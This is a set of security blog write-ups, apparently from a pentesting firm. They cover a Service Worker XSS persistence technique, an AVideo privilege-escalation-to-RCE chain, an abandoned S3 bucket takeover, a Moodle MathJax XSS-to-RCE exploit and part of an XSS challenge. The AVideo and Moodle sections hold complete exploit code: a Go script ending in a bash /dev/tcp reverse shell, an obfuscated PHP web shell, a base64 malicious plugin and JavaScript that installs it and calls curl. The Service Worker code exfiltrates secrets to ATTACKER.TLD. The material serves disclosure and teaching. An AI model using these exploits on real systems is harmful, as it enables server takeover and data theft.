Hello everyone,

It has been a while since my last post, five years to be exact. And I finally had some free time to share this write-up about an exploitation technique involving Service Workers and XSS. I discovered this issue a few years ago while doing some freelance pentesting work. While I no longer have access to the application, I will try to replicate the setup as closely as possible from memory.

The Target

While working on a project, I found a secret-sharing service that worked as follows: it accepted a string input and generated a URL where the string could be accessed. Once accessed, the string would be removed from the server, and subsequent visits to the link would return:

“Content not found or already accessed.”

For example, submitting the text Test resulted in the following HTTP request:

POST /submit HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Content-Length: 18
Content-Type: application/json
Host: vict.im
Origin: http://vict.im
Referer: http://vict.im/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
sec-ch-ua: "Not A(Brand";v="8", "Chromium";v="132", "Google Chrome";v="132"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"

{"content":"Test"}

Upon submission, I received a link such as:

https://vict.im/049034d00db33de4e58ea5c7e1e6bf5e

When I visited the link, it returned the string Test with the Content-Type: text/plain. However, when I submitted HTML code in the content field, something interesting happened:

POST /submit HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Content-Length: 18
Content-Type: application/json
Host: vict.im
Origin: https://vict.im
Referer: https://vict.im/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
sec-ch-ua: "Not A(Brand";v="8", "Chromium";v="132", "Google Chrome";v="132"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"

{"content":"<html><body><h1>Test</h1></body></html>"}

Unexpected Response:

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 47
ETag: W/"2f-23LlZ+e8azLWAnCO7KBmVGimMyc"
Date: Mon, 10 Feb 2025 19:34:37 GMT
Connection: keep-alive
Keep-Alive: timeout=5

<html><body><h1>Test</h1></body></html>

Since the response had Content-Type: text/html, I was able to inject JavaScript code that executed successfully. Additionally, when I uploaded a .js file content, the response header was set to Content-Type: text/javascript.

The Exploit

By registering a malicious Service Worker , I could intercept requests made to the /submit endpoint and exfiltrate data before forwarding the request.

https://ATTACKER.TLD/capture will receive any request to the endpoint /submit.

Malicious Service Worker Code:

self.addEventListener('fetch', (event) => {
    const url = new URL(event.request.url);
    if (url.pathname === '/submit' && event.request.method === 'POST') {
        event.respondWith(forwardAndContinue(event.request));
    }
});

async function forwardAndContinue(request) {
    const clonedRequest = request.clone();
    const requestData = await clonedRequest.json();
    
    // Forward intercepted request data to attacker's server
    fetch('https://ATTACKER.TLD/capture', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(requestData),
    });
    
    // Continue the original request so the victim remains unaware
    return fetch(request);
}

Explanation:

• The fetch event listener intercepts all outgoing requests.
• If the intercepted request is a POST request to /submit, it triggers forwardAndContinue.
• The function forwardAndContinue:
  1. Clones the request to avoid issues when reusing it.
  2. Extracts the request body (which contains the secret message).
  3. Sends the extracted data to an attacker’s server (https://ATTACKER.TLD/capture).
  4. Forwards the original request to ensure normal functionality, keeping the attack stealthy.

XSS Payload for Service Worker Injection:

After we send the Service Worker code, we will receive a random MD5 filename. We need to add it to the following code:

<html>
  <script>
    if ("serviceWorker" in navigator) {
      navigator.serviceWorker.register("/5f7e2e938823aaa7169ffa371f383a85"); // malicious-worker.js
    }
  </script>
</html>

Explanation:

• The script checks if Service Workers are supported.
• If they are, it registers the malicious Service Worker file (the attacker-controlled JavaScript file).
• Once executed in the victim’s browser, this persists until manually removed, ensuring continuous data exfiltration.

After submitting this code, we receive another link for the HTML page. We send this link to the victim. When they open it, the JavaScript executes and registers our malicious Service Worker at the root path of the service.

Now, every time the victim uses the service, their requests get intercepted and sent to our malicious endpoint before being forwarded.

Conclusion

By chaining XSS with a malicious Service Worker , an attacker can achieve persistent request interception & data exfiltration. Since Service Workers remain active even after the XSS is removed, this technique can be difficult to detect.

Introduction

What is AVideo (Audio Video Platform)?

AVideo is a term that means absolutely nothing, or anything related to video. The brand is simply identifiable with audio and video. AVideo Platform is an Audio and Video Platform or simply “A Video Platform”.

The project is written in PHP and has more than 1k stars on GitHub and over 4k live websites. We conducted a pentest for a client using AVideo in a live production environment.

The project is intriguing with many functions and files, so we started working on the platform to create a threat model.

Technical Details

After examining the project internals, we took a few notes that included:

• There are two roles in the system: Admin and User.
• The permissions check depends on the User::isAdmin() method.
• The system is vulnerable to XSS and CSRF.
• The admin user can upload PHP files!
• There are weak spots in some areas.

Privilege Escalation

During the source code review phase, we found a lot of interesting endpoints. After taking a deep look into the source code, we found an interesting file (objects/import.json.php):

<?php
global $global, $config;
if(!isset($global['systemRootPath'])){
    require_once '../videos/configuration.php';
}
header('Content-Type: application/json');

if (!User::canUpload() || !empty($advancedCustom->doNotShowImportMP4Button)) {
    return false;
}

$obj = new stdClass();

$obj->error = true;

$obj->fileURI = pathinfo($_POST['fileURI']);

//get description
$filename = $obj->fileURI['dirname'].DIRECTORY_SEPARATOR.$obj->fileURI['filename'];
$extensions = array('txt', 'html', 'htm');

$length = intval($_POST['length']);
if(empty($length) || $length>100){
    $length = 100;
}

foreach ($extensions as $value) {
    $_POST['description'] = "";
    $_POST['title'] = "";
    if(file_exists("{$filename}.{$value}")){
        $html = file_get_contents("{$filename}.{$value}");
        $breaks = array("<br />","<br>","<br/>");  
        $html = str_ireplace($breaks, "\r\n", $html);
        $_POST['description'] = $html;
        $cleanHTML = strip_tags($html);
        $_POST['title'] = substr($cleanHTML, 0, $length);
        break;
    }
}
$tmpDir = sys_get_temp_dir();
$tmpFileName = $tmpDir.DIRECTORY_SEPARATOR.$obj->fileURI['filename'];
$source = $obj->fileURI['dirname'].DIRECTORY_SEPARATOR.$obj->fileURI['basename'];

if (!copy($source, $tmpFileName)) {
    $obj->msg = "failed to copy $filename...\n";
    die(json_encode($obj));
}

if(!empty($_POST['delete']) && $_POST['delete']!=='false'){
    if(is_writable($source)){
        unlink($source);
        foreach ($extensions as $value) {
            if(file_exists("{$filename}.{$value}")){
                unlink("{$filename}.{$value}");
            }
        }
    }else{
        $obj->msg = "Could not delete $source...\n";
    }
}

$_FILES['upl']['error'] = 0;
$_FILES['upl']['name'] = $obj->fileURI['basename'];
$_FILES['upl']['tmp_name'] = $tmpFileName;
$_FILES['upl']['type'] = "video/mp4";
$_FILES['upl']['size'] = filesize($tmpFileName);

require_once $global['systemRootPath'] . 'view/mini-upload-form/upload.php';

echo json_encode($obj);

As you can see, the check is being done with the following code:

if (!User::canUpload() || !empty($advancedCustom->doNotShowImportMP4Button)) {
    return false;
}

If the user can upload video and doNotShowImportMP4Button is disabled, we can proceed to the next lines.

The vulnerable line is the following at line 51 :

if (unlink($source);

Why?

The unlink function is designed to delete files, and AVideo provides a way to reset the web application by deleting the config file at /videos/configuration.php.

The $source variable is the file path that has been aggregated at line 42 :

$source = $obj->fileURI['dirname'].DIRECTORY_SEPARATOR.$obj->fileURI['basename']; // source = dir + filename

fileURI is an array that has been assigned at line 16 :

$obj->fileURI = pathinfo($_POST['fileURI']); // fileURI=../video/configuration.php

So, to delete the config file, we have to send a POST request to the import.json.php file. We must include a value for $_POST['delete'] to access the code block of the vulnerable line.

There are 2 scenarios to exploit this issue to escalate the user’s privilege:

1. User with upload permission while the doNotShowImportMP4Button option is disabled.
2. Admin user with disabled dangerous functions (like uploading PHP files) in case of $global['disableAdvancedConfigurations'] = 1; It is like safe mode where the admin can do nothing harmful to the server.

As a result, we created a user with upload permission and disabled the doNotShowImportMP4Button. We sent the following request using Burp Suite:

POST /avideo/objects/import.json.php HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: http127001avideo=6t52ec7dsiojanu6feim3bg8ml;
Connection: close
Content-Length: 44

delete=1&fileURI=../videos/configuration.php

After sending the request, the file was deleted, and we got redirected to the install page!

We filed a bug, but there is more!

File Inclusion

If you were able to reproduce the previous vulnerability, there are two points you should consider:

1. What if MySQL credentials are not the default?
2. What if you can’t initiate a remote SQL connection?

Under those circumstances, we need to find the current database credentials. And that’s what we did!

We scanned the plugin folder to find interesting functions and found something in /plugin/LiveLinks/proxy.php:

<?php

require_once '../../videos/configuration.php';
session_write_close();
try {
    $global['mysqli']->close();
} catch (Exception $exc) {
    //echo $exc->getTraceAsString();
}

/*
* this file is to handle HTTP URLs into HTTPS
*/
if (!filter_var($_GET['livelink'], FILTER_VALIDATE_URL)) {
    echo "Invalid Link";
    exit;
}
header("Content-Type: video/vnd.mpegurl");
header("Content-Disposition: attachment;filename=playlist.m3u");
$content = url_get_contents($_GET['livelink']);
$pathinfo = pathinfo($_GET['livelink']); 
foreach (preg_split("/((\r?\n)|(\r\n?))/", $content) as $line) {
    $line = trim($line);
    if (!empty($line) && $line[0] !== "#") {
        if (!filter_var($line, FILTER_VALIDATE_URL)) {
            if(!empty($pathinfo["extension"])){
                $_GET['livelink'] = str_replace($pathinfo["basename"], "", $_GET['livelink']);
            }
            $line = $_GET['livelink'].$line;
        }
    }
    echo $line.PHP_EOL;
}

The line below is vulnerable to File Inclusion:

$content = url_get_contents($_GET['livelink']);

Moreover, there are no authentication checks, so anyone can exploit this issue by sending a GET request to the PHP file.

We must bypass the check in the following code:

if (!filter_var($_GET['livelink'], FILTER_VALIDATE_URL)) {
    echo "Invalid Link";
    exit;
}

We only need a valid URL with any URI scheme (file://, ftp://, php://, etc.). In this case, we can read the configuration.php file using the file URI scheme (file:///C:/xampp/htdocs/AVideo/videos/configuration.php).

We have the database credentials now :)

Remote Code Execution

We can achieve RCE using plugin upload. If the permissions are limited for the plugin folder, we found another way to execute PHP code using the install folder. In /install/checkConfiguration.php, there is a way to inject PHP code into the configuration.php file.

if(empty($_POST['salt'])){
    $_POST['salt'] = uniqid();
}
$content = "<?php
\$global['configurationVersion'] = 2;
\$global['disableAdvancedConfigurations'] = 0;
\$global['videoStorageLimitMinutes'] = 0;
if(!empty(\$_SERVER['SERVER_NAME']) && \$_SERVER['SERVER_NAME']!=='localhost' && !filter_var(\$_SERVER['SERVER_NAME'], FILTER_VALIDATE_IP)) { 
    // get the subdirectory, if exists
    \$subDir = str_replace(array(\$_SERVER[\"DOCUMENT_ROOT\"], 'videos/configuration.php'), array('',''), __FILE__);
    \$global['webSiteRootURL'] = \"http\".(!empty(\$_SERVER['HTTPS'])?\"s\":\"\").\"://\".\$_SERVER['SERVER_NAME'].\$subDir;
}else{
    \$global['webSiteRootURL'] = '{$_POST['webSiteRootURL']}';
}
\$global['systemRootPath'] = '{$_POST['systemRootPath']}';
\$global['salt'] = '{$_POST['salt']}'; // RCE at this line 
\$global['disableTimeFix'] = 0;
\$global['enableDDOSprotection'] = 1;
\$global['ddosMaxConnections'] = 40;

We just need to pass $_POST['salt'] as: 123'; exec($_GET["x"]);//

Then visit http://127.0.0.1/avideo/videos/configuration.php?x=[OS_COMMAND_HERE]

Now, we can execute system commands on the server!

Exploit

Now it’s time to combine all of these findings to gain a shell on the vulnerable system. First, you must turn off doNotShowImportMP4Button for the exploit to work.

You can find the exploit on GitHub here or copy it from below:

package main

import (
    "encoding/json"
    "io/ioutil"
    "net/http"
    "net/url"
    "os"
    "strings"

    "github.com/fatih/color"
)

type credential struct {
    mysqlHost string
    mysqlUser string
    mysqlPass string
}

type advancedCustom struct {
    DoNotShowImportMP4Button bool
}

type cookie struct {
    name  string
    value string
}

func checkRequirments(link string) bool {
    var setting advancedCustom
    rs, err := http.Get(link + "plugin/CustomizeAdvanced/advancedCustom.json.php")
    if err != nil {
        color.Red("[x] Unable to check requirements")
        panic(err)
    }
    defer rs.Body.Close()
    jsonRes, err := ioutil.ReadAll(rs.Body)
    if err != nil {
        panic(err)
    } else {
        json.Unmarshal(jsonRes, &setting)

        if setting.DoNotShowImportMP4Button {
            return false
        } else {
            return true
        }

    }
}

func login2cookie(link string, user string, password string) cookie {

    var c cookie
    resp, err := http.PostForm(link+"objects/login.json.php",
        url.Values{"user": {user}, "pass": {password}, "rememberme": {"false"}})

    if err != nil {
        color.Red("[x] Unable to login")
        panic(err)
    }
    defer resp.Body.Close()
    body, err := ioutil.ReadAll(resp.Body)
    stringBody := string(body)
    user = strings.Split(strings.Split(stringBody, "\"user\":")[1], ",")[0]

    if user == "false" {

        color.Red("[x] Unable to login (wrong username/password)")
        os.Exit(1)
    }
    for _, cookie := range resp.Cookies() {
        if cookie.Name != "user" && cookie.Name != "pass" && cookie.Name != "rememberme" {
            c.name = cookie.Name
            c.value = cookie.Value
        }
    }

    color.Green("[x] Logged in successfully!")

    return c
}

func readConfig(link string) credential {

    var cred credential
    // File path is set to ubuntu change it based on the server os and filename
    resp, err := http.Get(link + "plugin/LiveLinks/proxy.php?livelink=file:///C:/xampp/htdocs/AVideo/videos/configuration.php")
    if err != nil {
        color.Red("[X] Unable to read config file")
        panic(err)
    }

    defer resp.Body.Close()
    body, err := ioutil.ReadAll(resp.Body)
    stringBody := string(body)
    cred.mysqlHost = strings.Split(strings.Split(stringBody, "$mysqlHost = '")[1], "'")[0]
    cred.mysqlUser = strings.Split(strings.Split(stringBody, "$mysqlUser = '")[1], "'")[0]
    cred.mysqlPass = strings.Split(strings.Split(stringBody, "$mysqlPass = '")[1], "'")[0]

    color.Green("[X] Config file has been read!")

    return cred
}

func deleteConfig(link string, c cookie) {

    client := &http.Client{}
    PostData := strings.NewReader("delete=1&fileURI=../videos/configuration.php")

    req, err := http.NewRequest("POST", link+"objects/import.json.php", PostData)

    // Set cookie
    req.Header.Set("Cookie", c.name+"="+c.value)

    req.Header.Set("Content-Type", "application/x-www-form-urlencoded")

    _, err = client.Do(req)
    if err != nil {
        color.Red("[x] Unable to delete config file!")
        panic(err)
    }

    color.Green("[x] Config file has been deleted!")

}

func injectCode(link string, cred credential) {

    rceCode := "x';echo exec($_GET[\"x\"]); ?>" // PHP code that will be injected in the configuration file

    client := &http.Client{}

    // Change systemRootPath based on the OS
    PostData := strings.NewReader(`webSiteRootURL=` + link + `&systemRootPath=/var/www/html/avideo/&webSiteTitle=AVideo&databaseHost=` + cred.mysqlHost + `&databasePort=3306&databaseUser=` + cred.mysqlUser + `&databasePass=` + cred.mysqlPass + `&databaseName=aVideo212&mainLanguage=en&systemAdminPass=123456&contactEmail=tes@test.com&createTables=2&salt=` + rceCode)

    req, err := http.NewRequest("POST", link+"install/checkConfiguration.php", PostData)
    req.Header.Set("Content-Type", "application/x-www-form-urlencoded")

    _, err = client.Do(req)

    if err != nil {
        color.Red("[x] Unable to inject code!")
        panic(err)
    }

    color.Green("[x] Code has been injected into the config file!")

    // Initiate the reverse shell (reverse shell)

    _, err = http.Get(link + "videos/configuration.php?x=%2Fbin%2Fbash -c 'bash -i > %2Fdev%2Ftcp%2F192.168.153.138%2F8080 0>%261'%0A")
    if err != nil {
        color.Red("[X] Unable to send request!")
        panic(err)
    }
    color.Green("[x] Check your nc ;)")

}

func main() {
    var reqCookie cookie
    var dbCredential credential

    args := os.Args[1:]

    if len(args) < 3 {
        color.Red("Missing arguments")
        os.Exit(1)
    }

    url := args[0] // link
    u := args[1]   // username
    p := args[2]   // password

    // Check doNotShowImportMP4Button status
    if !checkRequirments(url) {
        color.Red("[x] doNotShowImportMP4Button is not disabled! exploit won't work :( if you are admin disable it from advancedCustom plugin")
        os.Exit(1)
    }

    // Get database credentials
    dbCredential = readConfig(url)

    // Get user cookie
    reqCookie = login2cookie(url, u, p)

    // Delete config
    deleteConfig(url, reqCookie)

    // Inject PHP code
    injectCode(url, dbCredential)

}

Usage

go run AVideo3xploit.go http://[target]/avideo/ username password

Tested on Ubuntu latest version, result:

New Project Idea

We will publish the static analyzer that we created during the pentest here.

What Now?

If you think your site/app/network is secure and want to ensure it, give us a call at contact@cube01.io.

Introduction

Last year, I traveled to Dubai to explore the city and meet some good friends: Yasser, Ahmed, and Ayoub.

I am a loyal Careem user and rely on it whenever I travel, including in Iraq. When it was time to return home, I ordered a taxi through the Careem app. I waited as the driver approached my hotel. I grabbed my bag and stood on the sidewalk, hoping he would spot me since it was early morning and the streets were empty. He saw me but didn’t move. I waved at him, but he drove off and canceled the ride, marking that I hadn’t shown up.

Frustrated, I ordered another ride as I needed to get to the airport as soon as possible. The new driver was nearby, so I didn’t have to wait long. However, I later discovered that the Careem app had already charged me a fee for the ride I didn’t take!

When I returned home, I submitted a complaint about the incident. Careem’s customer support called me, and I explained what had happened. They apologized and refunded the fee. Heeey!

Technical Details

A while later, I received an email from their customer support asking if I was satisfied with my recent interaction with their team. I noticed a broken link in the email and was surprised that they hadn’t caught it.

I used the browser’s inspect element tool to examine the broken link. The link was:

<img alt="Careem" title="Careem" src="https://ci5.googleusercontent.com/proxy/VFkr93bHbGyGsKAShSjEy1Wa5c2_E1roaPHqkXAgvfFVAe-4cPZ59CKXCpY-vig5E96sY7ojsvKFiy8uAkfA564sndlRHO01J_LqgsbCJyyzudeSS78=s0-d-e1-ft#https://s3.amazonaws.com/careemcrm/promotional/careem_logo_Care.png" class="CToWUd">

Since I was using Gmail, images were not displayed directly due to a security feature. The actual image link was the one after the location hash:

https://s3.amazonaws.com/careemcrm/promotional/careem_logo_Care.png

I suspected that careem_logo_Care.png had been deleted, causing the error. When I checked the S3 bucket link, I got the following response:

As you can see, the response indicates NoSuchBucket, which, in security terms, suggests that we can take over this bucket. And that’s exactly what happened. I used the AWS CLI with my AWS account to register the bucket. Then, I uploaded a file from my PC to the S3 bucket.

Here’s our PoC:

I tried to find a way to report this issue but had no luck. Careem does not have a bug bounty program, which was disappointing, given the company’s reputation.

I reached out to a friend who works at Careem’s Iraq office. He connected me with the security team, and they promptly fixed the issue. I offered to remove the S3 bucket from my account so they could reclaim it, but they said they didn’t need it anymore.

They later emailed me, confirming that they had resolved the issue. The root cause was:

Based on your initial description and proof-of-concept, this appears to be an abandoned S3 bucket that may have belonged to a former employee. As a result, no one had access to the necessary credentials.

For Bug Bounty Hunters & Security Engineers

It’s crucial to keep an eye on broken links—especially those in emails, PDFs, or old event pages. These often lead to security vulnerabilities.

URL Tracker Project!

I started a side project to track all cloud services and links that might be susceptible to takeover attacks. The project is still in progress, and you can follow it here.

What’s Next?

If you believe your site, app, or network is secure and want to verify it, feel free to contact us at contact@cube01.io.

In this article, we will cover a vulnerability that we discovered last month and reported to the Moodle Security team, which they have since patched. This technique is an interesting way to exploit XSS beyond the typical alert box.

Introduction

What is Moodle?

Moodle is a Learning Platform or course management system (CMS) - a free open-source software package designed to help educators create effective online courses based on sound pedagogical principles. You can download and use it on any computer, including web hosts, and it can scale from a single-teacher site to a 200,000-student university. Moodle has a large and diverse user community with over 100,000 registered sites worldwide, speaking over 140 languages. - Moodle.org

Due to the COVID-19 pandemic, many universities started using Moodle to support their e-learning efforts and deliver educational content to students at home. We noticed a couple of Iraqi universities adopting the platform, which motivated us to start looking for interesting vulnerabilities. Since other hackers might exploit the lack of monitoring to attack students and universities during this time, we felt it was our ethical duty to contribute to supporting the world during this hardship. Take a look at the platform’s statistics.

It is obvious that Moodle is a popular open-source software, which attracts the attention of cybercriminals and script kiddies. Consequently, many open-source contributors are working on the project.

Technical Details

We used the Moodle sandbox demo to understand how the platform works and performed some fuzzing while browsing the demo. The first thing to remember is to check the roles model of the platform to better understand each role’s privileges. After that, we downloaded the latest version of the project to look for security issues with the least privileged role (student). The student role has very limited access and can perform only a few actions with filtered content.

First, we scanned the source code for obvious issues but found none, as the project is very mature and protected.

One thing we focused on during this phase was finding any kind of privilege escalation. We were in the middle of this when we found another interesting input: the Description WYSIWYG editor. The downloaded version didn’t show it, but the Moodle sandbox demo did! We examined it further and discovered:

To prevent misuse by spammers, profile descriptions of users who are not yet enrolled in any course are hidden. New users must enroll in at least one course before they can add a profile description.

So, we created a course and let the student account join it. Then we went to the following URL:

http://127.0.0.1/moodle/user/edit.php?id=3&returnto=profile

I tried every trick in the book to create a stored XSS, but nothing worked until I learned more about the Moodle plugin system and found that it uses MathJax. Although it isn’t visible, if you create a math equation with the following format: $$ x=1 $$, it will be rendered to:

Based on SecurityMB’s research, any MathJax version < 2.7.4 is vulnerable to XSS. With this in mind, we found that MathJax was enabled by default and that Moodle was using version 2.7.2!

Using the known attack vector $$ \unicode{<img src=1 onerror=alert(1)>} $$ from previous research, we were able to create a stored XSS in Moodle!

Now we have a stored XSS in the system! We can trick the admin into visiting our profile and getting XSSed!

However, the boring alert box was not enough for this adventure. We wanted to take it to the next level.

From XSS to RCE: Beyond the Alert Box

Since we have a stored DOM XSS, we can steal the cookie, but there is an option in Moodle to use HTTPonly cookies, so we can’t get the admin cookie. Moreover, universities set the path /admin to whitelist IP addresses only. What should we do now?

While surfing the web, I found an exploit that requires an admin user account to execute PHP commands and upload a shell on the Moodle instance. So, we can create a CSRF to do that, right?

To upload a Moodle plugin, it has to meet specific rules, which we quickly examined.

There are multiple stages before you can upload a plugin, so it isn’t a simple CSRF page. We need to create a file upload CSRF and perform two steps after the upload CSRF to execute our shell.

As you can see, there is an exploit in Ruby, but it differs from our attack vector. Here are the steps we followed while writing our exploit:

1. Create version.php and /lang/en/block_rce.php files with the following content:

   • block_rce.php with @terjanq shell:

     <?=$_='$<>/'^'/{/{\{\{'\'\;\$\{\$\_\}\[\_\]\(\$\{\$\_\}\[\__\]);
     

   • version.php

     <?php 
     $plugin->version = 2020051300;
     $plugin->component = 'block_rce';
     

2. Zip the two files to create rce.zip.

3. Convert the rce.zip file from binary format to base64 using this code:

   <script>
   function onFileLoad(elementId, event) {
       document.getElementById(elementId).innerText = event.target.result;
   }
   function onChooseFile(event, onLoadFileHandler) {
       let input = event.target;
       let file = input.files[0];
       let fr = new FileReader();
       fr.onload = onLoadFileHandler;
       var fileContent = fr.readAsDataURL(file);
   }
   </script>
           
   <input type='file' onchange='onChooseFile(event, onFileLoad.bind(this, "contents"))' />
   <p id="contents"></p>
   

4. Write the full exploit:

   codeconst URL = "http://127.0.0.1/moodle/"; // Change this to your target URL 
   fetch(URL + "admin/tool/installaddon/index.php", {
       credentials: "include",
   })
       .then((res) => {
       return res.text();
       })
       .then((data) => {
       let sesskey = data.split('"sesskey":"')[1].split('"')[0];
       let itemid = data.split("amp;itemid=")[1].split("&")[0];
       let author = data.split('title="View profile">')[1].split("<")[0];
       let clientid = data.split('client_id":"')[1].split('"')[0];
       // rce.zip 
       let url =
       "data:application/x-zip-compressed;base64,UEsDBAoAAAAAAHmCuFAAAAAAAAAAAAAAAAAEAAAAcmNlL1BLAwQKAAAAAAC7gbhQAAAAAAAAAAAAAAAACQAAAHJjZS9sYW5nL1BLAwQKAAAAAACLhbhQAAAAAAAAAAAAAAAADAAAAHJjZS9sYW5nL2VuL1BLAwQUAAAACADNoLlQGp+xOCMAAAAoAAAAGQAAAHJjZS9sYW5nL2VuL2Jsb2NrX3JjZS5waHCzsbdVibdVV7Gx01ePU68GAnVrlWqV+Nro+FgNKCM+VtMaAFBLAwQUAAAACACGhbhQ8uNzbUEAAABJAAAADwAAAHJjZS92ZXJzaW9uLnBocLOxL8goUODlUinIKU3PzNO1K0stKs7Mz1OwVTAyMDIwMDU0NjCwRpJPzs8tyM9LzSsBqlBPyslPzo4vSk5VtwYAUEsBAh8ACgAAAAAAeYK4UAAAAAAAAAAAAAAAAAQAJAAAAAAAAAAQAAAAAAAAAHJjZS8KACAAAAAAAAEAGABsztMBzjHWAWzO0wHOMdYB7kmh/M0x1gFQSwECHwAKAAAAAAC7gbhQAAAAAAAAAAAAAAAACQAkAAAAAAAAABAAAAAiAAAAcmNlL2xhbmcvCgAgAAAAAAABABgA7OKXLc0x1gHs4pctzTHWAcnriynNMdYBUEsBAh8ACgAAAAAAi4W4UAAAAAAAAAAAAAAAAAwAJAAAAAAAAAAQAAAASQAAAHJjZS9sYW5nL2VuLwoAIAAAAAAAAQAYAORxW27RMdYB5HFbbtEx1gGsuPYszTHWAVBLAQIfABQAAAAIAM2guVAan7E4IwAAACgAAAAZACQAAAAAAAAAIAAAAHMAAAByY2UvbGFuZy9lbi9ibG9ja19yY2UucGhwCgAgAAAAAAABABgAKwWc07Yy1gErBZzTtjLWAWqgKf/MMdYBUEsBAh8AFAAAAAgAhoW4UPLjc21BAAAASQAAAA8AJAAAAAAAAAAgAAAAzQAAAHJjZS92ZXJzaW9uLnBocAoAIAAAAAAAAQAYAJX8ImnRMdYBlfwiadEx1gF4spXKzDHWAVBLBQYAAAAABQAFANsBAAA3AQAAAAA=";
       fetch(url)
           .then((res) => res.blob())
           .then((blob) => {
           const file = new File([blob], "rce.zip", {
               type: "application/x-zip-compressed",
           });
           
           myFormData = new FormData();
           myFormData.append("title", "");
           myFormData.append("author", author);
           myFormData.append("license", "allrightsreserved");
           myFormData.append("itemid", itemid);
           myFormData.append("accepted_types[]", ".zip");
           myFormData.append("repo_id", 4);
           myFormData.append("p", "");
           myFormData.append("page", "");
           myFormData.append("env", "filepicker");
           myFormData.append("sesskey", sesskey);
           myFormData.append("client_id", clientid);
           myFormData.append("maxbytes", -1);
           myFormData.append("areamaxbytes", -1);
           myFormData.append("ctx_id", 1);
           myFormData.append("savepath", "/");
           myFormData.append("repo_upload_file", file, "rce.zip");
           
           fetch(
               URL + "repository/repository_ajax.php?action=upload",
               {
               method: "post",
               body: myFormData,
               credentials: "include",
               }
           )
               .then((res) => {
               return res.text();
               })
               .then((res) => {
               let zipFile = res.split("draft\\/")[1].split("\\/")[0];
               myFormData = new FormData();
               myFormData.append("sesskey", sesskey);
               myFormData.append(
                   "_qf__tool_installaddon_installfromzip_form",
                   1
               );
               myFormData.append("mform_showmore_id_general", 1);
               myFormData.append("mform_isexpanded_id_general", 1);
               myFormData.append("zipfile", zipFile);
               myFormData.append("plugintype", "block");
               myFormData.append("rootdir", "");
               myFormData.append(
                   "submitbutton",
                   "Install+plugin+from+the+ZIP+file"
               );
           
               fetch(
                   URL + "admin/tool/installaddon/index.php",
                   {
                   method: "post",
                   body: myFormData,
                   credentials: "include",
                   }
               )
                   .then((res) => {
                   return res.text();
                   })
                   .then((res) => {
                   // debugger;
                   let installzipstorage = res
                       .split('installzipstorage" value="')[1]
                       .split('"')[0];
           
                   myFormData = new FormData();
                   myFormData.append("installzipcomponent", "block_rce");
                   myFormData.append("installzipstorage", installzipstorage);
                   myFormData.append("installzipconfirm", 1);
                   myFormData.append("sesskey", sesskey);
           
                   fetch(
                       URL + "admin/tool/installaddon/index.php",
                       {
                       method: "post",
                       body: myFormData,
                       credentials: "include",
                       }
                   ).then(() => {
                       fetch(
                       URL + "blocks/rce/lang/en/block_rce.php?_=system&__=curl%20http://192.168.153.138:1234/"
                       );
                   });
                   });
               });
           });
       });
   });
   

5. Upload this exploit to a cross-site host: http://sandbox.ahussam.me/rce_moodle.js.

6. Write the trigger MathJax payload:

   $$ \unicode{<img src='x' onerror='eval(`eval(atob("dmFyIG5ld1NjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpOyBuZXdTY3JpcHQuc3JjID0gImh0dHA6Ly9zYW5kYm94LmFodXNzYW0ubWUvcmNlX21vb2RsZS5qcyI7IG1haW5jb250ZW50LmFwcGVuZENoaWxkKG5ld1NjcmlwdCk7"))`)'>} $$
   

7. Update the profile description with the previous payload.

8. Send the URL to the admin user and listen on port 1234.

9. When the admin opens the URL, the shell gets uploaded and you receive a curl connection.

We reported this finding to the Moodle team. They patched it and were very responsive and friendly during the process.

What Now?

If you think your site/app/network is secure and want to make sure of it, give us a call at contact@cube01.io.

On March 13th, I was working on some boring college assignments. To take a break, I opened Twitter to see what was new and noticed that Intigriti was hosting an Easter XSS Challenge. I decided to give it a shot.

Challenge Overview

Here is a screenshot of the main challenge page:

The rules were clear, so there was no need for further explanation.

First Attempt

First, I checked the page’s source code.

There was nothing particularly interesting in the HTML code except for this script. The script.js file contained the following JavaScript code:

var hash = document.location.hash.substr(1);
if(hash){
  displayReason(hash);
}
document.getElementById("reasons").onchange = function(e){
  if(e.target.value != "")
    displayReason(e.target.value);
}
function reasonLoaded () {
    var reason = document.getElementById("reason");
    reason.innerHTML = unescape(this.responseText);
}
function displayReason(reason){
  window.location.hash = reason;
  var xhr = new XMLHttpRequest();
  xhr.addEventListener("load", reasonLoaded);
  xhr.open("GET", `./reasons/${reason}.txt`);
  xhr.send();
}

Code Breakdown

1. It checks if the hash property is set in the location object.
2. It sends an XHR request to the selected value (file).
3. It reads and prints the response to the page.

Line 11 is the key to this XSS challenge. The page sets the innerHTML of the div to a value that has been unescaped , so URL encoding could be bypassed.

Initial Exploit Attempt

I attempted to access a non-existent page by appending #test to the URL:

https://challenge.intigriti.io/#test

The filename was reflected in the response. I then attempted to use:

<img src=x onerror=alert(1)>

as the filename, expecting the XSS to trigger.

